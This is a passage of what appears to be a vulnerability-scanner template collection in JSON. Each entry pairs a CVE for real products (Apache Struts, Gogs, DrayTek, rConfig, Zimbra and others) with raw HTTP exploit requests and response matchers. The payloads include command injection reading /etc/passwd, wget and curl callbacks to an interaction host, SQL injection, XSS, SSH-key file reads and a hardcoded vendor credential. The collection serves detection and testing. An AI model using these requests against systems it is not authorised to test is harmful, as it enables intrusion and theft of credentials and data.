Redirect","severity":"medium"},"requests":[{"raw":["GET /wbm/login/?next=https%3A%2F%2Finteract.sh HTTP/1.1\nHost: {{Hostname}}\n","POST /wbm/login/?next=https%3A%2F%2Finteract.sh HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: csrftoken={{csrf}};\nReferer: {{RootURL}}/wbm/login/?next=https%3A%2F%2Finteract.sh\n\ncsrfmiddlewaretoken={{csrf}}&utcoffset=330&username={{username}}&password={{password}}\n"],"matchers":[{"type":"regex","part":"header_2","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}],"extractors":[{"type":"regex","name":"csrf","part":"body","group":1,"regex":["name='csrfmiddlewaretoken' value='(.*)' />"],"internal":true}]}]},{"id":"CVE-2022-1916","info":{"name":"WordPress Active Products Tables for WooCommerce <1.0.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=woot_get_smth&what={%22call_action%22:%22x%22,%22more_data%22:%22\\u003cscript%3Ealert(document.domain)\\u003c/script%3E%22}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>"]},{"type":"word","part":"body","words":["woot-content-in-popup","woot-system","woot-table"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24265","info":{"name":"Cuppa CMS v1.0 - SQL injection","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","@timeout: 20s\nPOST /components/menu/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\npath=component%2Fmenu%2F%26menu_filter%3D3'+and+sleep(6)--+-&data_get=eyJtZW51X2ZpbHRlciI6IjMifQ%3D%3D&uniqueClass=wrapper_content_906185\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"menu/html/edit.php\")"],"condition":"and"}]}]},{"id":"CVE-2020-8163","info":{"name":"Ruby on Rails <5.0.1 - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}?IO.popen(%27cat%20%2Fetc%2Fpasswd%27).read%0A%23"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24902","info":{"name":"Quixplorer <=2.4.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?action=post&order=bszop%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>&srt=yes","My Download"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13483","info":{"name":"Bitrix24 <=20.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=<a+href=\"/*\">*/%29%7D%29;function+__MobileAppList()%7Balert(1)%7D//>","{{BaseURL}}/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=%3Cimg+src=%22//%0d%0a)%3B//%22%22%3E%3Cdiv%3Ex%0d%0a%7D)%3Bvar+BX+=+window.BX%3Bwindow.BX+=+function(node,+bCache)%7B%7D%3BBX.ready+=+function(handler)%7B%7D%3Bfunction+__MobileAppList(test)%7Balert(document.domain)%3B%7D%3B//%3C/div%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<a href=\"/*\">*/)});function __MobileAppList(){alert(1)}//","function(handler){};function __MobileAppList(test){alert(document.domain);};//</div>"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-15505","info":{"name":"MobileIron Core & Connector <= v10.6 & Sentry <= v9.8 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /mifs/.;/services/LogService HTTP/1.1\nHost: {{Hostname}}\nReferer: https://{{Hostname}}\nContent-Type: x-application/hessian\nConnection: close\n\n{{hex_decode('630200480004')}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/x-hessian"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13117","info":{"name":"Wavlink Multiple AP - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/login.cgi HTTP/1.1\nHost: {{Hostname}}\nOrigin: http://{{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip, deflate\n\nnewUI=1&page=login&username=admin&langChange=0&ipaddr=192.168.1.66&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=wifi.wavlink.com&key=%27%3B%60wget+http%3A%2F%2F{{interactsh-url}}%3B%60%3B%23&password=asd&lang_select=en\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["parent.location.replace"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9047","info":{"name":"exacqVision Web Service - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/version.web"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["3.10.4.72058","3.12.4.76544","3.8.2.67295","7.0.2.81005","7.2.7.86974","7.4.3.89785","7.6.4.94391","7.8.2.97826","8.0.6.105408","8.2.2.107285","8.4.3.111614","8.6.3.116175","8.8.1.118913","9.0.3.124620","9.2.0.127940","9.4.3.137684","9.6.7.145949","9.8.4.149166","19.03.3.152166","19.06.4.157118","19.09.4.0","19.12.2.0","20.03.2.0","20.06.3.0"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13638","info":{"name":"rConfig 3.9 - Authentication Bypass(Admin Login)","severity":"critical"},"requests":[{"raw":["POST /lib/crud/userprocess.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=01b28e152ee044338224bf647275f8eb\n\n--01b28e152ee044338224bf647275f8eb\nContent-Disposition: form-data; name=\"username\"\n\n{{username}}\n--01b28e152ee044338224bf647275f8eb\nContent-Disposition: form-data; name=\"passconf\"\n\n{{password}}\n--01b28e152ee044338224bf647275f8eb\nContent-Disposition: form-data; name=\"password\"\n\n{{password}}\n--01b28e152ee044338224bf647275f8eb\nContent-Disposition: form-data; name=\"email\"\n\n{{email}}\n--01b28e152ee044338224bf647275f8eb\nContent-Disposition: form-data; name=\"editid\"\n\n\n--01b28e152ee044338224bf647275f8eb\nContent-Disposition: form-data; name=\"add\"\n\nadd\n--01b28e152ee044338224bf647275f8eb\nContent-Disposition: form-data; name=\"ulevelid\"\n\n9\n--01b28e152ee044338224bf647275f8eb--\n","GET /login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /lib/crud/userprocess.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&pass={{password}}&sublogin=1\n"],"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["rConfig - Configuration Management","Logged in as","dashboadFieldSet"],"condition":"and"},{"type":"word","part":"header_3","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-26153","info":{"name":"Event Espresso Core-Reg 4.10.7.p - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/event-espresso-core-reg/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Event Espresso","Tested up to:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php?page=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cb"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"/></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2020-6207","info":{"name":"SAP Solution Manager 7.2 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /EemAdminService/EemAdmin HTTP/1.1\nHost: {{Hostname}}\nSOAPAction: \"\"\nContent-Type: text/xml; charset=UTF-8\nConnection: close\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:adm=\"http://sap.com/smd/eem/admin/\"><soapenv:Header/><soapenv:Body><adm:getAllAgentInfo/></soapenv:Body></soapenv:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[":Envelope",":Body",":getAllAgentInfoResponse"],"condition":"and"},{"type":"word","part":"header","words":["text/xml","SAP NetWeaver Application Server"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-25864","info":{"name":"HashiCorp Consul/Consul Enterprise <=1.9.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["PUT {{BaseURL}}/v1/kv/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\n\n<!DOCTYPE html><script>alert(document.domain)</script>\n","GET {{BaseURL}}/v1/kv/{{randstr}}%3Fraw HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body_2","words":["<!DOCTYPE html><script>alert(document.domain)</script>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35987","info":{"name":"Rukovoditel <= 2.7.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=entities/&action=save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0&notes=test\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2020-10546","info":{"name":"rConfig 3.9.4 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/compliancepolicies.inc.php?search=True&searchColumn=policyName&searchOption=contains&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL+--+"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[project-discovery]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-15867","info":{"name":"Gogs 0.5.5 - 0.12.2 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}\n","GET /repo/create HTTP/1.1\nHost: {{Hostname}}\n","POST /repo/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&user_id=1&repo_name={{randstr}}&private=on&description=&gitignores=&license=&readme=Default&auto_init=on\n","POST /{{username}}/{{randstr}}/settings/hooks/git/post-receive HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&content=%23%21%2Fbin%2Fbash%0D%0Acurl+{{interactsh-url}}\n","GET /{{username}}/{{randstr}}/_new/master HTTP/1.1\nHost: {{Hostname}}\n","POST /{{username}}/{{randstr}}/_new/master HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&last_commit={{last_commit}}&tree_path=test.txt&content=test&commit_summary=&commit_message=&commit_choice=direct\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body_1","words":["content=\"Gogs"]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"_csrf\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"auth_csrf","group":1,"regex":["name=\"_csrf\" content=\"(.*)\""],"internal":true},{"type":"regex","name":"last_commit","group":1,"regex":["name=\"last_commit\" value=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2020-35580","info":{"name":"SearchBlox <9.2.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/searchblox/servlet/FileServlet?col=9&url=/etc/passwd"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2020-8209","info":{"name":"Citrix XenMobile Server - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["fileDownload=true","application/octet-stream","attachment;"],"condition":"and"},{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2020-13405","info":{"name":"Microweber <1.1.20 - Information Disclosure","severity":"high"},"requests":[{"raw":["POST /module/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer: {{BaseURL}}admin/view:modules/load_module:users\n\nmodule={{endpoint}}\n"],"payloads":{"endpoint":["users/controller","modules/users/controller","/modules/users/controller"]},"matchers":[{"type":"dsl","dsl":["contains(body,\"username\")","contains(body,\"password\")","contains(body,\"password_reset_hash\")","status_code==200","contains(header,\"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2020-7318","info":{"name":"McAfee ePolicy Orchestrator <5.10.9 Update 9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /PolicyMgmt/policyDetailsCard.do?poID=19&typeID=3&prodID=%27%22%3E%3Csvg%2fonload%3dalert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["Policy Name","'\"><svg/onload=alert(document.domain)>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8515","info":{"name":"DrayTek - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/mainfunction.cgi HTTP/1.1\nHost: {{Hostname}}\n\naction=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-17530","info":{"name":"Apache Struts 2.0.0-2.5.25 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?id=%25%7B%28%23instancemanager%3D%23application%5B%22org.apache.tomcat.InstanceManager%22%5D%29.%28%23stack%3D%23attr%5B%22com.opensymphony.xwork2.util.ValueStack.ValueStack%22%5D%29.%28%23bean%3D%23instancemanager.newInstance%28%22org.apache.commons.collections.BeanMap%22%29%29.%28%23bean.setBean%28%23stack%29%29.%28%23context%3D%23bean.get%28%22context%22%29%29.%28%23bean.setBean%28%23context%29%29.%28%23macc%3D%23bean.get%28%22memberAccess%22%29%29.%28%23bean.setBean%28%23macc%29%29.%28%23emptyset%3D%23instancemanager.newInstance%28%22java.util.HashSet%22%29%29.%28%23bean.put%28%22excludedClasses%22%2C%23emptyset%29%29.%28%23bean.put%28%22excludedPackageNames%22%2C%23emptyset%29%29.%28%23arglist%3D%23instancemanager.newInstance%28%22java.util.ArrayList%22%29%29.%28%23arglist.add%28%22cat+%2Fetc%2Fpasswd%22%29%29.%28%23execute%3D%23instancemanager.newInstance%28%22freemarker.template.utility.Execute%22%29%29.%28%23execute.exec%28%23arglist%29%29%7D"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2020-35736","info":{"name":"GateOne 1.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/downloads/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-22840","info":{"name":"b2evolution CMS <6.11.6 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/email_passthrough.php?email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Finteract.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*?)$"]}]}]},{"id":"CVE-2020-36289","info":{"name":"Jira Server and Data Center - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin","{{BaseURL}}/jira/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["rel=\\\"admin\\\""]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-17505","info":{"name":"Artica Web Proxy 4.30 - OS Command Injection","severity":"high"},"requests":[{"raw":["GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","GET /cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["array(2)","Position: ||whoami||","root"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35846","info":{"name":"Agentejo Cockpit < 0.11.2 - NoSQL Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/auth/check"],"body":"{\n  \"auth\": {\n    \"user\": {\n      \"$eq\": \"admin\"\n    },\n    \"password\": [\n      0\n    ]\n  }\n}\n","headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["password_verify() expects parameter"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24312","info":{"name":"WordPress Plugin File Manager (wp-file-manager) Backup Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/uploads/wp-file-manager-pro/fm_backup/"],"matchers-condition":"and","matchers":[{"type":"word","words":["Index of","wp-content/uploads/wp-file-manager-pro/fm_backup","backup_"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-12116","info":{"name":"Zoho ManageEngine OpManger - Arbitrary File Read","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nConnection: close\n","GET {{endpoint}}../../../../bin/.ssh_host_rsa_key HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nCache-Control: max-age=0\nConnection: close\nReferer: http://{{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body_2, \"BEGIN RSA PRIVATE KEY\")","status_code_2 == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"endpoint","regex":["(?m)/cachestart/.*/jquery/"],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-7796","info":{"name":"Zimbra Collaboration Suite < 8.8.15 Patch 7 - Server-Side Request Forgery","severity":"critical"},"requests":[{"raw":["GET /zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://{{interactsh-url}}%23 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-7136","info":{"name":"HPE Smart Update Manager < 8.5.6 - Remote Unauthorized Access","severity":"critical"},"requests":[{"raw":["POST /session/create HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json\n\n{\"hapi\":{\"username\":\"Administrator\",\"password\":\"any_password\",\"language\":\"en\",\"mode\":\"gui\", \"usesshkey\":true, \"privatekey\":\"any_privateky\", \"passphrase\":\"any_passphase\",\"settings\":{\"output_filter\":\"passed\",\"port_number\":\"444\"}}}\n","GET /session/{{sessionid}}/node/index HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["hmessage","Command completed successfully.","node_name"],"condition":"and"}],"extractors":[{"type":"regex","name":"sessionid","group":1,"regex":["\"sessionId\":\"([a-z0-9.]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-19295","info":{"name":"Jeesns 1.4.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/weibo/topic/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>","JEESNS"],"condition":"and","case-insensitive":true},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-26248","info":{"name":"PrestaShop Product Comments <4.2.0 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 20s\nGET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(6)))a) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"average_grade\")"],"condition":"and"}]}]},{"id":"CVE-2020-29453","info":{"name":"Jira Server Pre-Auth - Arbitrary File Retrieval (WEB-INF, META-INF)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/s/{{randstr}}/_/%2e/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml","{{BaseURL}}/s/{{randstr}}/_/%2e/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<groupId>com.atlassian.jira</groupId>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-15568","info":{"name":"TerraMaster TOS <.1.29 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3E{{filename}}.txt HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","GET /include/{{filename}}.txt HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-29583","info":{"name":"ZyXel USG - Hardcoded Credentials","severity":"critical"},"requests":[{"raw":["GET /?username=zyfwp&password=PrOw!aN_fXp HTTP/1.1\nHost: {{Hostname}}\n","GET /ext-js/index.html HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["data-qtip=\"Web Console","CLI","Configuration\"></a>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-17518","info":{"name":"Apache Flink 1.5.1 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /jars/upload HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y\n\n------WebKitFormBoundaryoZ8meKnrrso89R6Y\nContent-Disposition: form-data; name=\"jarfile\"; filename=\"../../../../../../../tmp/poc\"\n\n{{randstr}}\n------WebKitFormBoundaryoZ8meKnrrso89R6Y--\n","GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fpoc HTTP/1.1\n"],"matchers":[{"type":"dsl","dsl":["contains(body_2, \"{{randstr}}\") && status_code == 200"]}]}]},{"id":"CVE-2020-15500","info":{"name":"TileServer GL <=3.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss%27%29%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["'>\"<svg/onload=confirm('xss')>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13851","info":{"name":"Artica Pandora FMS 7.44 - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /pandora_console/ajax.php?page=include/ajax/events&perform_event_response=10000000&target=cat+/etc/passwd&response_id=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"header","words":["text/html","PHPSESSID="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35729","info":{"name":"Klog Server <=2.41 - Unauthenticated Command Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/actions/authenticate.php"],"body":"user={{dummy}}%20%26%20echo%20%cG9jLXRlc3Rpbmc%3D%22%20%7C%20base64%20-d%20%26%20echo%22&pswd={{dummy}}","matchers":[{"type":"word","words":["poc-testing"]}]}]},{"id":"CVE-2020-27838","info":{"name":"KeyCloak - Information Exposure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/auth/realms/master/clients-registrations/default/security-admin-console"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["\"clientId\":\\s*\"security-admin-console\"","\"secret\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-14092","info":{"name":"WordPress PayPal Pro <1.1.65 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?cffaction=get_data_from_database&query=SELECT%20*%20from%20wp_users"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["\"user_login\"","\"user_email\"","\"user_pass\"","\"user_activation_key\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-2140","info":{"name":"Jenkin Audit Trail <=3.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample","{{BaseURL}}/jenkins/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<h1>sample"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-15050","info":{"name":"Suprema BioStar <2.8.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../../../../../../../../windows/win.ini"],"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2020-0618","info":{"name":"Microsoft SQL Server Reporting Services - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ReportServer/Pages/ReportViewer.aspx"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["view report"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8644","info":{"name":"playSMS <1.4.3 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /index.php?app=main&inc=core_auth&route=login HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n","POST /index.php?app=main&inc=core_auth&route=login&op=login HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nX-CSRF-Token={{csrf}}&username=%7B%7B%60echo%20%27CVE-2020-8644%27%20%7C%20rev%60%7D%7D&password=\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["4468-0202-EVC"]},{"type":"status","status":[200]}],"extractors":[{"type":"xpath","name":"csrf","internal":true,"xpath":["/html/body/div[1]/div/div/table/tbody/tr[2]/td/table/tbody/tr/td/form/input"],"attribute":"value","part":"body"}]}]},{"id":"CVE-2020-10220","info":{"name":"rConfig 3.9 - SQL 